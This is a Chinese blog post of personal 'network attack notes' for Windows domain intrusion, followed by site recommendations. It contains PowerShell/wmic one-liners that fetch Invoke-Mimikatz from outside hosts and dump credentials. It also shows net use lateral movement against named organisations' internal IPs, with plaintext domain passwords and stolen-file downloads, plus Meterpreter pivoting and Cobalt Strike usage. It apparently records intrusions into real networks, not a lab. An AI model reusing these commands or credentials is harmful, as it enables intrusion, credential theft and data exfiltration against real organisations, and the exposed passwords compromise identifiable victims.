网络攻击笔记

最新推荐文章于 2024-05-10 21:25:01 发布
最新推荐文章于 2024-05-10 21:25:01 发布
阅读量736 收藏 1
点赞数
分类专栏: 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/40711145
版权

powershell 执行

windows 命令 wmic 

http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html

命令:  可以 dump 出 密码来

powershell 脚本是 https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1

1)becon 或者 meterpreter   先  getsystem

2)wmic process call create "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds\" >d:\2.txt"

直接2.txt 上的 dump 上有密码

 

设置linux console 快捷键   Command:  gnome-terminal 

 

先开启kali 服务 System service 开启 metasploit

下载 cobaltstrike  http://www.advancedpentest.com/download

 

Net view命令用于查看远程主机的所有共享资源,其语法格式为: net view \\IP地址

net view /domain 查看域帐户

net view /domain:JINDALSTEEL

net view /domain:JINDAL.AFRICA

whoami /groups  查询组下面的帐户 无用

net user /domain 查询域下帐户  无用

net group /domain   域下组    无用

net group "domain admins"/domain  上面查询的组的域信息 无用

 

shell cmd /c for %a in (WIN-DC,WIN-WALKER) do ping -n 1 %a >> info2.txt 看存活主机

shell cmd /c for /f %a in (info.txt) do ping -n 1 %a >> zend.txt

ps 看进程 steal_token pid SYSTEM权限

 

Net use命令把远程主机的某个共享资源映射为本地盘符以方便使用,其语法格式为: net use <驱动器盘符>: \\IP地址\sharename 
net use Z: \\192.168.10.210\nero

net use \\ip(或者主机名)\c$ 域帐户密码 /u:域\域帐户

 

cmd /c for  %a in (10.36.68.211,10.36.68.227,10.36.68.195,10.36.68.197,10.36.68.201,10.36.68.217)

do net use \\%a jspl@BHARAT(密码) /u:jindalggn\root(域帐号) >> use.txt

 

dir \\10.36.68.227\c dir"10.36.68.227\c \Documents and settings"  看到电脑帐户jspladmin

net user jspladmin /domain

net use \\10.36.68.195 /del

net use \\10.36.68.195 Jin786Dal /u:jindalggn\jspladmin

dir "\\10.36.68.195\c$\Documents and settings\jspladmin\my documents"

net view \\10.36.68.211 看共享资源  然后查看

dir \\10.36.68.211\NASUtils

dir "\\10.36.68.211\work_station"

download \\10.36.68.221\work_station\Block-IX .pptx

copy "\\10.36.68.221\work_station\Block-IX .pptx" c:\windows\temp\wahaha.log

download wahaha.log

net time \\127.0.0.1

net use 查看连接

 

meterpreter 上 进行端口扫描

run autoroute -s x.x.x.0/24

background

use auxiliary/scanner/portscan/tcp

set threads 50

set ports 80,8080,21,22,23,445,443,3389

expoit


计划任务:

at \\x.x.x.x 10:11 c:\xxx.exe

 

2003 下不支持powershell

cmd /c powershell "IEX (New-Object Net.WebClient).DownloadString('http://107.170.234.111:80/download/index.ps1'); Invoke-Mimikatz -Command \"privilege::debug sekurlsa::logonpasswords\"" > c:\3.txt

* Username : Administrator 
* Domain : TAIHE.COM 
* Password : Domainadmin!@#

 

当它的网不能上外网时,那么就上传脚本 ps1 去搞 

powershell "IEX (New-Object Net.WebClient).DownloadString('c:/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" >c:\2.txt


etherape 监控

pandamac
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows文件传输及执行—Powershell
qq_27828281的博客
12-14 1587
Windows平台使用PowerShell下载文件并执行。
网络攻击——笔记
weixin_30629977的博客
10-30 96
powershell 执行 windows 命令 wmic http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html 命令: 可以 dump 出 密码来 powershell 脚本是https://github.com/clymb3r/PowerShell/b...
【慕课笔记】1-1 网络基础知识-网络基础简介
yxt_y的专栏
03-28 372
两台计算机通过网络进行通信: ①二者有唯一标识——IP地址 ②二者有共同的语言——协议 ③二者用相应的端口号辨别不同应用程序的通讯——端口号 1物理层:网线 网卡 双绞线 4传输层:TCP/IP协议 5应用层:用户直接接触到的层。 HTTP超文本传输协议,上网电子商务 FTP文件传输协议,文件上传下载及共享 SMTP简单邮件传送协议,文件的发送 Telenet远
信息安全软考 第二章 网络攻击原理与常用方法笔记总结
最新发布
xiangxue888的博客
05-10 620
信息安全软考 第二章 网络攻击原理与常用方法笔记总结
windows命令执行漏洞
11-30 921
1、powershell eg: 1 powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz....
PowerShell使用
weixin_44110913的博客
08-02 2073
目录 Windows PowerShell PowerShell的执行策略 绕过执行策略执行PowerShell脚本 PowerShell的常用文件类命令 PowerShell远程下载文件并执行 渗透测试常用的PowerShell命令 Powershell导入文件  Windows PowerShell Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在Windows7及其以上的系统...
网络安全笔记.docx
12-18
这份笔记涵盖了网络安全的基本概念、DNS 安全、拒绝服务攻击、网络安全属性、加密体制、安全协议等方面的知识点。 1. 网络安全的概念 网络安全是指保护计算机网络中的数据、软件和硬件免受未经授权的访问、使用、...
网络安全-渗透完整笔记
03-27
网络渗透是一种攻击手段,也是一种综合的高级攻击技术,也被成为“渗透测试” [3]。渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,包括对系统的任何弱点、技术缺陷或漏洞的主动...
学习笔记网络攻击
03-31
本资源是网络攻击的学习笔记,列出了一些网络攻击的原理及响应的解决方案
网络安全笔记01-041
08-03
(1) 口令窃取 (2) 欺骗攻击 (3) 缺陷和后门攻击 (4) 认证失效 (5) 协议缺陷 (6) 信息泄露 (7) 指数攻击 (8) 拒绝服务 (1) 鉴
网络模块-ARP详解-笔记
10-29
ARP 攻击是一种常见的网络攻击方式,攻击者可以通过 ARP 欺骗、ARP 欺骗攻击等方式来攻击网络。ARP 攻击的原理是攻击者伪装成目标主机,发送假的 ARP 响应报文,以便劫持网络流量。 ARP 防护 为了防止 ARP 攻击,...
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 1982
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell)
服务器是如何被植入挖矿程序的
Amy安的博客
08-17 2263
首先,攻击者利用Sqlserver应用的弱口令漏洞,并借助Sqlserver自身的命令执行组件执行cmd命令 "C:\Windows\system32\cmd.exe" /c whoami whoami是操作系统中用于查看当前有效用户名的命令 执行ps命令 powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))" or "C:\Windows\system32\cmd.exe" /c powershell -c "iex(
检测和缓解PowerShell攻击的方法
12306小哥
09-27 2122
声明:本文档由12306Bro个人业余时间翻译,个人行为与公司无任何关系!译文来源INSIDER THREAT SECURITY BLOG博客站相关文档。如您对翻译文档内容有异议,请将原文文档做为主要参考,原文版权由博客站及其相关成员持有并保留。翻译文章禁止用于任何商业用途,仅供交流与学习。 PowerShell已经发展成为针对windows系统攻击的主要方式之一,是攻击者使用本机工具攻击的一种...
DownloadString”时发生异常:“无法解析此远程名称: ‘raw.gith ubusercontent.com
luminous_you的博客
09-23 3589
powershell反弹时 出现错误 使用“1”个参数调用“DownloadString”时发生异常:“无法解析此远程名称: 'raw.gith ubusercontent.com'” 所在位置 行:1 字符: 64 + powershell IEX (New-Object System.Net.Webclient).DownloadString <<<< ('https: //raw.githubusercontent.com/besimorhino/powercat/master
网络攻防学习笔记
热门推荐
huangwwu11的专栏
11-15 1万+
1:远程攻击的几个阶段 1) 准备阶段 确定攻击目的——收集信息——服务分析——系统分析——漏洞分析 2) 攻击阶段 破坏型攻击(现成的工具,难度低) / 入侵型攻击(获得权限,难度比较大) 3) 善后阶段 留后门 / 擦除痕迹(修改日志、替换系统程序) 2:扫描与防御技术 1) 扫描是把双刃剑 对系统管理者而言,可以了解网络的安全配置和正在运行的应用服务,及时发现系统和网络中
burpsuit学习--修改来源地址
zcc1414的专栏
10-08 7657
安装Burpsuit: 安装JAVA  环境   JDK 命令: Java –jar burpsuite_v1.4.jar   创建批处理 运行就行了 proxy -> options  设置代理     --------------     IE  上设置代理   -》连接-》局域网 这里就可以监视了 Proxy  ->  History  ->  看到有一条拦截 右
千锋网络安全笔记pdf
06-26
笔记共涵盖了网络安全领域的各个方面,包括网络安全基础知识、网络攻击与防御技术、安全测试工具及漏洞挖掘技术等。这些内容涵盖了安全行业的方方面面,对于想要深入学习和掌握网络安全知识的人来说具有非常高的参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值